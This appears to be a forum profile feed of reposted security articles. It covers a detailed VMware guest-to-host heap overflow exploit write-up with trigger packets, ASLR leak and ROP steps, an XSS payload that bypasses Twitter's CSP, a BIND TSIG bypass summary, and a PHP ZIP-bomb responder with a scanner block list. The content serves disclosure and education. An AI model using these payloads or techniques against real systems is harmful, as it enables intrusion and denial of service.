Everything posted by Nytro

  1. The Weak Bug - Exploiting a Heap Overflow in VMware
     acez, 06 Jul 2017

Introduction

In March 2017, I took part in the pwn2own contest with team Chaitin Security Research Lab. The target I was focused on was VMware Workstation Pro, and we managed to get a working exploit before the contest. Unfortunately, a version of VMware was released on March 14th, the day before the contest, with a patch for the vulnerability our exploit was taking advantage of. This blog post is a narrative of our journey from finding the vulnerability to exploiting it. I would like to thank @kelwin, whose assistance was indispensable during the development of the exploit. I would also like to thank the ZDI folks for their recent blog post which motivated us to get off our asses and make this writeup :P. The post is divided into three parts. First we will briefly describe the VMware RPCI gateway, next we will describe the vulnerability, and finally we'll have a look at how we were able to use this single exploit to defeat ASLR and get code execution.

The VMware RPCI

Unsurprisingly, VMware exposes a number of ways for the guest and host to communicate with each other. One of these is an interface called the Backdoor. Thanks to an interesting design, the guest is able to send commands through this interface from user mode. This same interface is used (partly) by VMware Tools in order to communicate with the host. Let's have a look at some sample code (taken from lib/backdoor/backdoorGcc64.c in open-vm-tools):

void
Backdoor_InOut(Backdoor_proto *myBp) // IN/OUT
{
   uint64 dummy;

   __asm__ __volatile__(
#ifdef __APPLE__
        /*
         * Save %rbx on the stack because the Mac OS GCC doesn't want us to
         * clobber it - it erroneously thinks %rbx is the PIC register.
         * (Radar bug 7304232)
         */
        "pushq %%rbx"           "\n\t"
#endif
        "pushq %%rax"           "\n\t"
        "movq 40(%%rax), %%rdi" "\n\t"
        "movq 32(%%rax), %%rsi" "\n\t"
        "movq 24(%%rax), %%rdx" "\n\t"
        "movq 16(%%rax), %%rcx" "\n\t"
        "movq 8(%%rax), %%rbx"  "\n\t"
        "movq (%%rax), %%rax"   "\n\t"
        "inl %%dx, %%eax"       "\n\t" /* NB: There is no inq instruction */
        "xchgq %%rax, (%%rsp)"  "\n\t"
        "movq %%rdi, 40(%%rax)" "\n\t"
        "movq %%rsi, 32(%%rax)" "\n\t"
        "movq %%rdx, 24(%%rax)" "\n\t"
        "movq %%rcx, 16(%%rax)" "\n\t"
        "movq %%rbx, 8(%%rax)"  "\n\t"
        "popq (%%rax)"          "\n\t"
#ifdef __APPLE__
        "popq %%rbx"            "\n\t"
#endif
        : "=a" (dummy)
        : "0" (myBp)
        /*
         * vmware can modify the whole VM state without the compiler knowing
         * it. So far it does not modify EFLAGS. --hpreg
         */
        :
#ifndef __APPLE__
        /* %rbx is unchanged at the end of the function on Mac OS. */
        "rbx",
#endif
        "rcx", "rdx", "rsi", "rdi", "memory"
   );
}

Looking at this code, one thing that seems odd is the inl instruction. Under normal circumstances (the default I/O privilege level on Linux, for instance), a user mode program should not be able to issue I/O instructions; the instruction should simply cause the program to fault and crash. It does in fact generate a privilege error, but on the host the hypervisor catches this fault. This ability to communicate with the host from user land in the guest makes the Backdoor an interesting attack surface, since it satisfies the pwn2own requirement: "An attempt in this category must be launched from within the guest operating system from a non-admin account and execute arbitrary code on the host operating system."

The guest puts the value 0x564D5868 in $eax, and the I/O port number 0x5658 or 0x5659 is stored in $dx for low bandwidth and high bandwidth data transfers respectively. Other registers are used for passing parameters. For instance, the lower half of $ecx stores the backdoor command number. In the case of RPCI, the command number is set to BDOOR_CMD_MESSAGE = 30.
The file lib/include/backdoor_def.h contains a list of some supported backdoor commands. The host catches the fault, reads the command number and dispatches the corresponding handler. There are a lot of other details I am omitting here, so if you are interested in this interface you should read the source code.

RPCI

The Remote Procedure Call Interface is built on top of the aforementioned backdoor and basically allows a guest to issue requests to the host to perform certain operations. For instance, operations like Drag n Drop / Copy Paste, as well as a number of other random things such as sending or retrieving info about the guest, use this interface. The format of RPCI requests is pretty simple: <cmd> <params>. For example, the RPCI request "info-get guestinfo.ip" can be used to request the IP address assigned to the guest. For each RPCI command, an endpoint is registered and handled in vmware-vmx. Please note that some RPCI commands can also use VMCI sockets, but that is beyond the scope of this article.

The Vulnerability

After some time reversing the different RPCI handlers, I decided to focus on the DnD and Copy&Paste endpoints. They seemed to be the most complex command handlers, and therefore I was hoping they would be the best place to hunt for vulnerabilities. Although I got a chance to understand a lot of the inner workings of DnD/CP, it became apparent that a lot of the functionality in these handlers is not reachable without user interaction. The core functionality of DnD/CP basically maintains a state machine which has some unsatisfiable states when there is no user interaction (e.g. a mouse drag from host to guest). At a loss, I decided to have a look at the vulnerabilities that were reported during Pwnfest 2016 and mentioned in this VMware advisory; my idb had a lot of "symbols" at this point, so it was easy to use bindiff to find the patches.
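As a side note, the "<cmd> <params>" RPCI request format can be modeled in a few lines: the host-side dispatcher conceptually splits the command word off the request string and routes it to the registered endpoint. This is only a sketch of the framing, not vmware-vmx internals:

```python
def dispatch(request):
    """Split an RPCI request into (command, parameters), the way the
    host-side dispatcher conceptually routes it to an endpoint."""
    cmd, _, params = request.partition(" ")
    return cmd, params

# Example requests taken from the article
print(dispatch("info-get guestinfo.ip"))            # ('info-get', 'guestinfo.ip')
print(dispatch("tools.capability.dnd_version 3"))   # ('tools.capability.dnd_version', '3')
```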
The code below shows one of the vulnerable functions before it was patched (it turns out the source is available, in services/plugins/dndcp/dnd/dndCPMsgV4.c; the vulnerability is still in the master branch of the open-vm-tools git repo, by the way):

static Bool
DnDCPMsgV4IsPacketValid(const uint8 *packet, size_t packetSize)
{
   DnDCPMsgHdrV4 *msgHdr = NULL;

   ASSERT(packet);

   if (packetSize < DND_CP_MSG_HEADERSIZE_V4) {
      return FALSE;
   }

   msgHdr = (DnDCPMsgHdrV4 *)packet;

   /* Payload size is not valid. */
   if (msgHdr->payloadSize > DND_CP_PACKET_MAX_PAYLOAD_SIZE_V4) {
      return FALSE;
   }

   /* Binary size is not valid. */
   if (msgHdr->binarySize > DND_CP_MSG_MAX_BINARY_SIZE_V4) {
      return FALSE;
   }

   /* Payload size is more than binary size. */
   if (msgHdr->payloadOffset + msgHdr->payloadSize > msgHdr->binarySize) {   // [1]
      return FALSE;
   }

   return TRUE;
}

Bool
DnDCPMsgV4_UnserializeMultiple(DnDCPMsgV4 *msg,
                               const uint8 *packet,
                               size_t packetSize)
{
   DnDCPMsgHdrV4 *msgHdr = NULL;

   ASSERT(msg);
   ASSERT(packet);

   if (!DnDCPMsgV4IsPacketValid(packet, packetSize)) {
      return FALSE;
   }

   msgHdr = (DnDCPMsgHdrV4 *)packet;

   /*
    * For each session, there is at most 1 big message. If the received
    * sessionId is different with buffered one, the received packet is for
    * another new message. Destroy old buffered message.
    */
   if (msg->binary && msg->hdr.sessionId != msgHdr->sessionId) {
      DnDCPMsgV4_Destroy(msg);
   }

   /* Offset should be 0 for new message. */
   if (NULL == msg->binary && msgHdr->payloadOffset != 0) {
      return FALSE;
   }

   /* For existing buffered message, the payload offset should match. */
   if (msg->binary &&
       msg->hdr.sessionId == msgHdr->sessionId &&
       msg->hdr.payloadOffset != msgHdr->payloadOffset) {
      return FALSE;
   }

   if (NULL == msg->binary) {
      memcpy(msg, msgHdr, DND_CP_MSG_HEADERSIZE_V4);
      msg->binary = Util_SafeMalloc(msg->hdr.binarySize);
   }

   /* msg->hdr.payloadOffset is used as received binary size. */
   memcpy(msg->binary + msg->hdr.payloadOffset,
          packet + DND_CP_MSG_HEADERSIZE_V4,
          msgHdr->payloadSize);                                              // [2]
   msg->hdr.payloadOffset += msgHdr->payloadSize;

   return TRUE;
}

This function is called in Version 4 of DnD/CP on the host's side when the guest sends fragmented DnD/CP command packets. The host invokes this function in order to reassemble the chunks of the DnD/CP message sent by the guest. The first packet received should have payloadOffset == 0 and binarySize specifying the size of a buffer dynamically allocated on the heap. At [1], there is a check to make sure that payloadOffset and payloadSize do not go out of bounds, by comparing them to the binarySize of the packet header. At [2], the data is copied to the allocated buffer. However, the check at [1] is flawed, because it only works for the first received packet. For subsequent packets, the check is invalid, since the code expects the binarySize field of the packet header to match that of the first packet in the fragment stream. You might also have noticed that at [1] there is an integer overflow, but this is actually not exploitable, since payloadOffset needs to be set either to 0 or to the expected payloadOffset of the buffered message. Therefore, the vulnerability can be triggered, for example, by sending the following sequence of fragments:

packet 1 {
    ...
    binarySize    = 0x100
    payloadOffset = 0
    payloadSize   = 0x50
    sessionId     = 0x41414141
    ...
    # ...0x50 bytes of payload...
}

packet 2 {
    ...
    binarySize    = 0x1000
    payloadOffset = 0x50
    payloadSize   = 0x100
    sessionId     = 0x41414141
    ...
    # ...0x100 bytes of payload...
}

Armed with this knowledge, I decided to have a look at Version 3 of DnD/CP to see if anything had been missed in there. Lo and behold, the exact same vulnerability was present in Version 3 of the code (this vulnerability was discovered by reversing, but we later noticed that the code for v3 was also present in the git repo of open-vm-tools):
Bool
DnD_TransportBufAppendPacket(DnDTransportBuffer *buf,           // IN/OUT
                             DnDTransportPacketHeader *packet,  // IN
                             size_t packetSize)                 // IN
{
   ASSERT(buf);
   ASSERT(packetSize == (packet->payloadSize + DND_TRANSPORT_PACKET_HEADER_SIZE) &&
          packetSize <= DND_MAX_TRANSPORT_PACKET_SIZE &&
          (packet->payloadSize + packet->offset) <= packet->totalSize &&
          packet->totalSize <= DNDMSG_MAX_ARGSZ);

   if (packetSize != (packet->payloadSize + DND_TRANSPORT_PACKET_HEADER_SIZE) ||
       packetSize > DND_MAX_TRANSPORT_PACKET_SIZE ||
       (packet->payloadSize + packet->offset) > packet->totalSize ||         // [1]
       packet->totalSize > DNDMSG_MAX_ARGSZ) {
      goto error;
   }

   /*
    * If seqNum does not match, it means either this is the first packet, or there
    * is a timeout on the other side. Reset the buffer in all cases.
    */
   if (buf->seqNum != packet->seqNum) {
      DnD_TransportBufReset(buf);
   }

   if (!buf->buffer) {
      ASSERT(!packet->offset);
      if (packet->offset) {
         goto error;
      }
      buf->buffer = Util_SafeMalloc(packet->totalSize);
      buf->totalSize = packet->totalSize;
      buf->seqNum = packet->seqNum;
      buf->offset = 0;
   }

   if (buf->offset != packet->offset) {
      goto error;
   }

   memcpy(buf->buffer + buf->offset,
          packet->payload,
          packet->payloadSize);
   buf->offset += packet->payloadSize;
   return TRUE;

error:
   DnD_TransportBufReset(buf);
   return FALSE;
}

This function is called for fragment reassembly in version 3 of the DnD/CP protocol. Here we can see the same situation as before at [1]: trusting that totalSize in subsequent fragments will match the totalSize of the first fragment. Thus this vulnerability can be triggered in a similar fashion to the previous one:

packet 1 {
    ...
    totalSize     = 0x100
    payloadOffset = 0
    payloadSize   = 0x50
    seqNum        = 0x41414141
    ...
    # ...0x50 bytes of payload...
}

packet 2 {
    ...
    totalSize     = 0x1000
    payloadOffset = 0x50
    payloadSize   = 0x100
    seqNum        = 0x41414141
    ...
    # ...0x100 bytes of payload...
}

This brings us to the title of this blog post: "The Weak Bug".
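Before moving on, the flawed fragment check shared by both protocol versions can be condensed into a short simulation using the sizes from the packet examples above. The header constants here are illustrative placeholders, not vmware-vmx's real values:

```python
# Illustrative limits; the real DND_CP_* constants differ.
MAX_PAYLOAD = 0x10000
MAX_BINARY  = 0x100000

def is_packet_valid(hdr):
    """Mirror of the flawed bounds check at [1]: offsets are validated
    against THIS packet's binarySize, not the first fragment's."""
    if hdr["payloadSize"] > MAX_PAYLOAD:
        return False
    if hdr["binarySize"] > MAX_BINARY:
        return False
    if hdr["payloadOffset"] + hdr["payloadSize"] > hdr["binarySize"]:
        return False
    return True

# Packet 1 allocates a 0x100-byte buffer; packet 2 lies about binarySize.
alloc_size = 0x100
pkt1 = dict(binarySize=0x100,  payloadOffset=0x00, payloadSize=0x50)
pkt2 = dict(binarySize=0x1000, payloadOffset=0x50, payloadSize=0x100)

assert is_packet_valid(pkt1)
assert is_packet_valid(pkt2)          # passes, because 0x50 + 0x100 <= 0x1000
end = pkt2["payloadOffset"] + pkt2["payloadSize"]
print(hex(end), "written into a buffer of", hex(alloc_size))  # 0x150 vs 0x100
```

So the second fragment sails through validation and the memcpy at [2] writes 0x50 bytes past the end of the 0x100-byte allocation.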
In the context of a contest like pwn2own, I think the bug is weak because not only was it inspired by a previously reported one, it was pretty much exactly the same one. Therefore it really was no surprise when it was patched before the contest (okay, maybe we didn't expect it to get patched one day before the contest :P). The corresponding VMware advisory can be found here. The latest version of VMware Workstation Pro affected by this bug is version 12.5.3. We can now have a look at how to abuse the vulnerability and come up with a guest-to-host escape!

Exploitation

We want to gain code execution through this vulnerability, so we need to either find a function pointer to overwrite on the heap or corrupt the vtable of a C++ object. First though, let's have a look at how to set the DnD/CP protocol to version 3. This can be done by sending the following sequence of RPCI commands:

tools.capability.dnd_version 3
tools.capability.copypaste_version 3
vmx.capability.dnd_version
vmx.capability.copypaste_version

The first two lines respectively set the versions of DnD and Copy/Paste. The latter two lines query the versions. They are required because querying the versions is what actually causes the version to be switched. The RPCI command handler for vmx.capability.dnd_version checks whether the version of the DnD/CP protocol has been modified and, if so, creates a corresponding C++ object for the specified version. For version 3, two C++ objects of size 0xA8 are created: one for DnD commands and one for Copy/Paste commands. The vulnerability gives us control over the allocation size as well as the overflow size, and it also allows us to write out of bounds multiple times. Ideally, we could just allocate an object of size 0xA8, make it land before the C++ object, and overwrite the vtable pointer with a pointer to controlled data to get code execution. It is not as simple as that, however, since there are a few things we need to address first.
Mainly, we need to find a way to defeat ASLR, which in our case also implies dealing with the Windows Low Fragmentation Heap.

Defeating ASLR

We need to find an object we can overflow into and somehow influence to get an info leak: for example, an object with a length field that we can read back from the guest, or a data pointer we can easily corrupt. We were unable to find such an object, so we decided to reverse the other RPCI command handlers a bit more and see what we could come up with. Of particular interest were commands that had counterparts; in other words, where you can use one command to set some data and then use another, related command to retrieve the data back. The winner was the info-set and info-get command pair:

info-set guestinfo.KEY VALUE
info-get guestinfo.KEY

VALUE is a string, and its length controls the allocation size of a buffer on the heap. Moreover, we can allocate as many strings as we want this way. But how can we use these strings to leak data? Simply by overwriting past the null byte and "lining up" the string with the adjacent chunk. If we can allocate a string (or strings) between the overflowing chunk and a DnD or CP object, then we can leak the vtable address of the object and hence the base address of vmware-vmx. Since we can allocate many strings, we can increase our chances of obtaining this heap layout despite the randomization of the LFH. However, there is still an aspect of the allocations we do not control, namely whether a DnD or CP object is allocated after our overflowing heap chunk. From our tests, we were able to get a probability of success between 60% and 80% by playing with different parameters of our exploit, such as allocating and freeing different amounts of strings.
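The string-based leak can be modeled in a few lines. The chunk size matches the 0xA8 bucket from the article, but the addresses and the vtable offset below are invented for the sketch:

```python
# Toy model of the info-set/info-get leak: three adjacent 0xA8 chunks,
# [Ov][S][T], where S is an info-set string and T is the target C++ object.
CHUNK = 0xA8
heap = bytearray(CHUNK * 3)

VTABLE_OFF = 0x123456                   # hypothetical vtable offset in vmware-vmx
base = 0x7ff640000000                   # hypothetical (unknown to us) module base

heap[CHUNK:CHUNK + 9] = b"A" * 8 + b"\x00"                    # S: "AAAAAAAA\0"
heap[2*CHUNK:2*CHUNK + 8] = (base + VTABLE_OFF).to_bytes(8, "little")  # T's vtable ptr

def info_get(off):
    """Read a string back the way info-get would: up to the first NUL byte."""
    return bytes(heap[off:heap.index(0, off)])

assert info_get(CHUNK) == b"A" * 8      # before the overflow

# Overflow from Ov: fill S completely, destroying its NUL terminator so the
# string now runs straight into T's vtable pointer.
heap[CHUNK:2*CHUNK] = b"B" * CHUNK
leaked = info_get(CHUNK)[CHUNK:]        # pointer bytes, up to the first NUL
ptr = int.from_bytes(leaked.ljust(8, b"\x00"), "little")  # high bytes of a
                                        # user-mode pointer are zero anyway
print(hex(ptr - VTABLE_OFF))            # recovered vmware-vmx base
```

The read stops at the first NUL inside the pointer, but since the top bytes of a 64-bit user-mode pointer are zero, the truncated read still recovers the full value.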
In summary, we have the following layout (Ov is the overflowing chunk, S is a string and T is the target object). The plan is basically to allocate a number of strings filled with A's, for example, then overflow the adjacent chunk with some B's and read back the value of all the allocated strings; the one that contains B's is the one we have corrupted. At this point we have a string we can use to read the leak with, so we can keep overflowing with a granularity matching the size of the objects in the bucket (0xA8), reading the string back every time to check whether it contains leaked data. We can tell when we have reached the target object because we know the offsets (from the vmware-vmx base) of the vtables of the DnD and CopyPaste objects. Therefore, after each overflow, we can look at the low bits of the retrieved data to see if they match those of the vtable offsets.

Getting Code Execution

Now that we have obtained the info leak and know what type of C++ object we are about to overflow, we can proceed with the rest of the exploitation. There are two cases we need to handle, CopyPaste and DnD. Please note that this is probably just one line of exploitation out of many others.

The CopyPaste case

In the case of the CopyPaste object, we can just overwrite the vtable and make it point to some data we control. We need a pointer to controlled data which will be interpreted as the vtable address of the object. The way we decided to do this is by using another RPCI command: unity.window.contents.start. This command is used by the Unity mode to draw images on the host, and it allows us to place values that we control at a known offset from the base address of vmware-vmx. Two of the arguments taken by the command are the width and height of the image, each of them a 32-bit word. By combining the two, we can have a 64-bit value at a known address. We line it up with the vtable entry of the CopyPaste object that we can trigger by just sending a CopyPaste command.
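The width/height trick boils down to two attacker-chosen 32-bit words stored adjacently forming one controlled 64-bit value. Which word lands in the low half depends on the structure layout inside vmware-vmx; the packing below (width at the lower address) is an assumption for illustration:

```python
import struct

def qword_from_dims(width, height):
    """Pack the two 32-bit unity image parameters into one controlled qword,
    assuming width is stored at the lower address (illustrative layout)."""
    return struct.unpack("<Q", struct.pack("<II", width, height))[0]

pivot = 0x7ff641424344                  # hypothetical stack pivot gadget address
width = pivot & 0xFFFFFFFF              # low dword of the target value
height = pivot >> 32                    # high dword of the target value
assert qword_from_dims(width, height) == pivot
```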
In summary, we do the following:

1. Send a unity.window.contents.start command to write the 64-bit address of a stack pivot gadget at a known address, using the height and width parameters.
2. Overwrite the vtable address with a pointer to that 64-bit value (adjusted for the offset of the vtable entry that will be called).
3. Trigger the use of the vtable by sending a CopyPaste command.
4. ROP.

The DnD case

In the case of the DnD object, we can't just overwrite the vtable, because right after the overflow the vtable is accessed to call another method, so we need to do it another way. We only know the address of one qword that we control (through the unity image's width and height), so we can't forge a vtable of arbitrary size. Let's have a look at the structure of the DnD and CP objects, which can be summarized as follows (again, similar structures can be found in open-vm-tools, but they have slightly different formats in vmware-vmx):

DnD_CopyPaste_RpcV3 {
    void *vtable;
    ...
    uint64_t ifacetype;
    RpcUtil {
        void *vtable;
        RpcBase *mRpc;
        DnDTransportBuffer {
            uint64_t seqNum;
            uint8_t *buffer;
            uint64_t totalSize;
            uint64_t offset;
            ...
        }
        ...
    }
}

RpcBase {
    void *vtable;
    ...
}

A lot of fields have been omitted since they are irrelevant for the purpose of this blog post. There is a pointer to an RpcBase object, which is also a C++ object. Therefore, if we can overwrite the mRpc field with a pointer-to-pointer to data we control, we can have a vtable of our liking for the RpcBase object. For this pointer we can again use the unity.window.contents.start command. Another parameter the command takes, on top of width and height, is imgsize, which controls the size of the image buffer. This buffer is allocated and its address can also be found at a static offset from the vmware-vmx base. We can populate the contents of the buffer by using the unity.window.contents.chunk command.
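The mRpc pointer chase can be sketched as a toy byte-level model: mRpc is overwritten to point at a known slot, that slot points at the unity image buffer, and the buffer's first qword is the fake vtable entry. All addresses here are invented:

```python
mem = {}                                  # address -> qword, toy "memory"

IMG_BUF     = 0x5000                      # unity.window.contents.start buffer
PTR_SLOT    = 0x6000                      # known slot holding IMG_BUF's address
STACK_PIVOT = 0x7ff641424344              # hypothetical gadget address

mem[IMG_BUF] = STACK_PIVOT                # fake vtable: first entry = pivot
mem[PTR_SLOT] = IMG_BUF                   # pointer-to-pointer to our data

mRpc = PTR_SLOT                           # value written by the heap overflow

# What vmware-vmx conceptually does when a DnD command comes in:
vtable = mem[mRpc]                        # RpcBase->vtable  (our IMG_BUF)
target = mem[vtable]                      # first vtable entry, then called
assert target == STACK_PIVOT
```

PTR_SLOT plays the role of the fake RpcBase object: its first qword is treated as the vtable pointer, which is why a pointer-to-pointer to controlled data is enough.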
In summary, we do the following:

1. Send a unity.window.contents.start command to allocate a buffer where we will store a fake vtable.
2. Send a unity.window.contents.chunk command to populate the fake vtable with a stack pivot gadget.
3. Overwrite the mRpc field of the DnD object with an address pointing to the address of the allocated buffer.
4. Trigger the use of the mRpc field's vtable by sending a DnD command.
5. ROP.

P.S.: There is an RWX page in vmware-vmx (at least in version 12.5.3).

Notes on Reliability

As mentioned earlier, the exploit is not 100% reliable due to the Windows LFH. Some things could be attempted in order to increase the reliability. Here is a short list:

• Monitor allocations of size 0xA8 to see if we can take advantage of the determinism of the LFH after a number of malloc()'s and free()'s, as described here and here.
• Find other C++ objects to overwrite, preferably some that we can spray.
• Find other objects on the heap with function pointers, preferably some that we can spray.
• Find a separate info leak bug that we can use as an oracle.
• Be more creative.

Useless Video

Here is a video of the exploit in "action". (Yes, it's VMware inside VMware.)

Conclusion

"No pwn no fun": if you want to take part in a contest like pwn2own, make sure you either have multiple bugs or find some inspired vulnerabilities.

Source: http://acez.re/the-weak-bug-exploiting-a-heap-overflow-in-vmware/
  2. Meet Hydrogen One, World's First Android Smartphone with Holographic Display
     Will be the control center of RED's upcoming Hydrogen System
     Jul 6, 2017 20:19 GMT · By Marius Nestor

RED, the leading manufacturer of professional digital cinema cameras, announced that it is developing the world's first holographic Android smartphone, which the company will launch sometime next year. Dubbed the Hydrogen One Media Machine, the standalone, unlocked smartphone is powered by Google's Android mobile operating system and promises to make glasses obsolete for enjoying multi-dimensional content. RED is known for its innovative, modular camera systems that offer groundbreaking image quality, but with Hydrogen One it wants to offer the world a new "look around depth" experience right in the palm of your hand. The device will have a 5.7-inch professional holographic display that features nanotechnology, designed from the outset to seamlessly switch between 2D and 3D content, interactive games, and holographic multi-view content. Both landscape and portrait modes will be supported by the ingenious display of the Hydrogen One Media Machine, which will support RED's H4V (Hydrogen 4-View) content, stereo 3D content, as well as 2D and 3D VR, MR, and AR.

The foundation of a future multi-dimensional system

In terms of audio quality, RED will embed a proprietary H3O algorithm in the Android OS that powers Hydrogen One, which converts stereo sound into expansive multi-dimensional audio. RED plans to develop Hydrogen One as the first piece of a future multi-dimensional system that the company is working on and calls the Hydrogen System, with Hydrogen One serving as the control center of this upcoming modular system.
"The HYDROGEN SYSTEM incorporates a new high-speed data bus to enable a comprehensive and ever-expanding modular component system, which will include future attachments for shooting higher quality motion and still images as well as HYDROGEN format holographic images," says RED in the press announcement. The Hydrogen One Media Machine will sell starting at $1,195 USD for the aluminium variant and $1,595 USD for the titanium one. It will integrate with the RED camera program and allow access to the Red Channel, which contains only 4-View holographic content. The device is planned for Q1 2018.

Source: http://news.softpedia.com/news/meet-hydrogen-one-world-s-first-android-smartphone-with-holographic-display-516858.shtml
  3. Making an XSS triggered by CSP bypass on Twitter
     tbmnull, Jul 6

Hi there, I'm a security researcher and bug hunter, but still learning. I want to share how hard it was to find an XSS (Cross-Site Scripting) vulnerability on such a huge and well-secured organization as Twitter.com, and how I achieved it by combining it with another security vulnerability, a CSP (Content Security Policy) bypass. Here is the story:

After digging a lot on Twitter's subdomains, I came across https://careers.twitter.com/. As you can guess, it is Twitter's career site: you can search for jobs as an opportunity to work with them, but I search for bugs. Sometime later, I thought I'd found a reflection for an XSS at the URL https://careers.twitter.com/en/jobs-search.html?location=1" onmouseover="alert(1)&q=1&start=70&team= via the location parameter. But wait, there was no alert! I couldn't trigger it, because they've implemented CSP as:

content-security-policy: default-src 'self' ; connect-src 'self' ; font-src 'self' https://*.twimg.com https://*.twitter.com data:; frame-src 'self' https://twitter.com https://*.twitter.com [REDACTED] https://*.twitter.com; report-uri https://twitter.com/i/csp_report

and it blocked the JavaScript alert box from appearing. So I was unsuccessful in getting this to work, unfortunately. Then I turned to my master @brutelogic as always and told him that I had found some XSS (without sharing the details or the domain) but could not get it to work because of the CSP. He advised me to find a way to bypass it! I still remember his words: "For god's sake, stop talking and go find a way to bypass the CSP!". Thanks bro :) I tried a lot to find a way, and gave up at the time. After trying a lot more and looking at other domains, I figured out a URL that was flying under the radar, issued silently within GET requests.
The URL was: https://analytics.twitter.com/tpm?tpm_cb= . The response Content-Type was application/javascript, and whatever I wrote as the tpm_cb parameter was reflected in the page! I was lucky this time, and I tried to combine both my findings to make the XSS work. So I created:

https://careers.twitter.com/en/jobs-search.html?location=1"><script src=//analytics.twitter.com/tpm?tpm_cb=alert(document.domain)></script>//

hoping that the "><script src= injection at the XSS reflection point would work. And voila! It worked! Happy end! I screamed out in my office and all my colleagues were scared. Sorry guys :) I immediately reported all of this to Twitter via their bug bounty program on HackerOne; they triaged it and rewarded me very quickly. They also fixed the XSS on the career site, although the CSP bypass took a long time to fix. But in the end both sides were satisfied. Thanks to the Twitter Security Team and the awesome HackerOne community! I hope this helps newbies like me to develop themselves. And if you want to share your thoughts, just ping me on Twitter: @tbmnull. Thanks for reading.

Source: https://medium.com/@tbmnull/making-an-xss-triggered-by-csp-bypass-on-twitter-561f107be3e5
  4. TSIG authentication bypass through signature forgery in ISC BIND

Synacktiv experts discovered a flaw in the TSIG protocol implementation in BIND that allows an attacker who knows a valid key name to bypass TSIG authentication on zone update, notify, and transfer operations. The issue is that when a TSIG digest with a wrong length is provided (i.e. the digest's length does not match the hash algorithm used), the server still signs its answer, using the provided digest as a prefix. This allows an attacker to forge the signature of a valid request, hence bypassing TSIG authentication.

Download: http://www.synacktiv.ninja/ressources/CVE-2017-3143_BIND9_TSIG_dynamic_updates_vulnerability_Synacktiv.pdf
  5. Published on Jul 5, 2017. Ad-hoc session working on pivoted packets through Meterpreter. Not finished, more to do, but small chunks of progress.
  6. How to defend your website with ZIP bombs
     the good old methods still work today
     Posted by Christian Haschek on 2017-07-05

[update] I'm on some list now that I have written an article about some kind of "bomb", ain't I?

If you have ever hosted a website or administrated a server, you'll be well aware of bad people trying bad things with your stuff. When I first hosted my own little Linux box with SSH access at age 13, I read through the logs daily and reported the IPs (mostly from China and Russia) that tried to connect to my sweet little box (which was actually an old ThinkPad T21 with a broken display running under my bed) to their ISPs. If you have a Linux server with SSH exposed, you can see how many connection attempts are made every day:

grep 'authentication failures' /var/log/auth.log

Hundreds of failed login attempts, even though this server has password authentication disabled and runs on a non-standard port.

Wordpress has doomed us all

Ok, to be honest, web vulnerability scanners existed before Wordpress, but since WP is so widely deployed, most web vuln scanners include checks for misconfigured wp-admin folders or unpatched plugins. So if a small, new hacking group wants to gain some hot cred, they'll download one of these scanner things and start testing against many websites in hopes of gaining access to a site and defacing it.

Sample of a log file during a scan using the tool Nikto

This is why all server and website admins have to deal with gigabytes of logs full of scanning attempts. So I was wondering: is there a way to strike back? After going through some potential implementations with an IDS or Fail2ban, I remembered the ZIP bombs from the old days.

WTH is a ZIP bomb?

It turns out ZIP compression is really good with repetitive data, so if you have a really huge text file consisting of repetitive data like all zeroes, it will compress really well. Like REALLY well.
As 42.zip shows us, it can compress a 4.5 petabyte (4,500,000 gigabyte) file down to 42 kilobytes. When you try to actually look at the content (extract or decompress it), you'll most likely run out of disk space or RAM.

How can I ZIP bomb a vuln scanner?

Sadly, web browsers don't understand ZIP, but they do understand GZIP. So first we'll have to create the 10 gigabyte GZIP file filled with zeroes. We could apply multiple rounds of compression, but let's keep it simple for now.

dd if=/dev/zero bs=1M count=10240 | gzip > 10G.gzip

Creating the bomb and checking its size

As you can see, the result is 10 MB large. We could do better, but it's good enough for now. Now that we have created this thing, let's set up a PHP script that will deliver it to a client.

<?php
//prepare the client to receive GZIP data. This will not be suspicious
//since most web servers use GZIP by default
header("Content-Encoding: gzip");
header("Content-Length: ".filesize('10G.gzip'));
//Turn off output buffering
if (ob_get_level()) ob_end_clean();
//send the gzipped file to the client
readfile('10G.gzip');

That's it! So we could use this as a simple defense like this:

<?php
$agent = strtolower($_SERVER['HTTP_USER_AGENT']); //strtolower(), not lower()
$url = $_SERVER['REQUEST_URI'];

//check for nikto, sqlmap or "bad" subfolders which only exist on wordpress
if (strpos($agent, 'nikto') !== false ||
    strpos($agent, 'sqlmap') !== false ||
    startsWith($url, 'wp-') ||
    startsWith($url, 'wordpress') ||
    startsWith($url, 'wp/')) {
    sendBomb();
    exit();
}

function sendBomb(){
    //prepare the client to receive GZIP data. This will not be suspicious
    //since most web servers use GZIP by default
    header("Content-Encoding: gzip");
    header("Content-Length: ".filesize('10G.gzip'));
    //Turn off output buffering
    if (ob_get_level()) ob_end_clean();
    //send the gzipped file to the client
    readfile('10G.gzip');
}

function startsWith($haystack, $needle){
    return (substr($haystack, 0, strlen($needle)) === $needle);
}

This script obviously is not - as we say in Austria - the yellow of the egg, but it can defend against the script kiddies I mentioned earlier, who have no idea that all these tools have parameters to change the user agent.

Sooo. What happens when the script is called?

Client   Result
IE 11    Memory rises, IE crashes
Chrome   Memory rises, error shown
Edge     Memory rises, then drips and loads forever
Nikto    Seems to scan fine but no output is reported
SQLmap   High memory usage until crash

(If you have tested it with other devices/browsers/scripts, please let me know and I'll add it here.)

Reaction of the script called in Chrome

If you're a risk taker: try it yourself.

Source: https://blog.haschek.at/post/f2fda
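The compression ratio the post relies on can be checked with a scaled-down experiment: compress a run of zero bytes and compare the sizes. 10 MB of zeros is enough to show the effect; the 10 GB version from the dd command behaves the same, only bigger:

```python
import gzip
import io

plain_size = 10 * 1024 * 1024          # 10 MB of zeros

buf = io.BytesIO()
with gzip.GzipFile(fileobj=buf, mode="wb") as f:
    f.write(b"\x00" * plain_size)      # highly repetitive data compresses well
bomb = buf.getvalue()

print(len(bomb), "compressed bytes for", plain_size, "plain bytes")
# the compressed output is a tiny fraction of the input (well over 500:1)
```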
  7. Kernel Pool Overflow Exploitation In Real World – Windows 7

1) Introduction

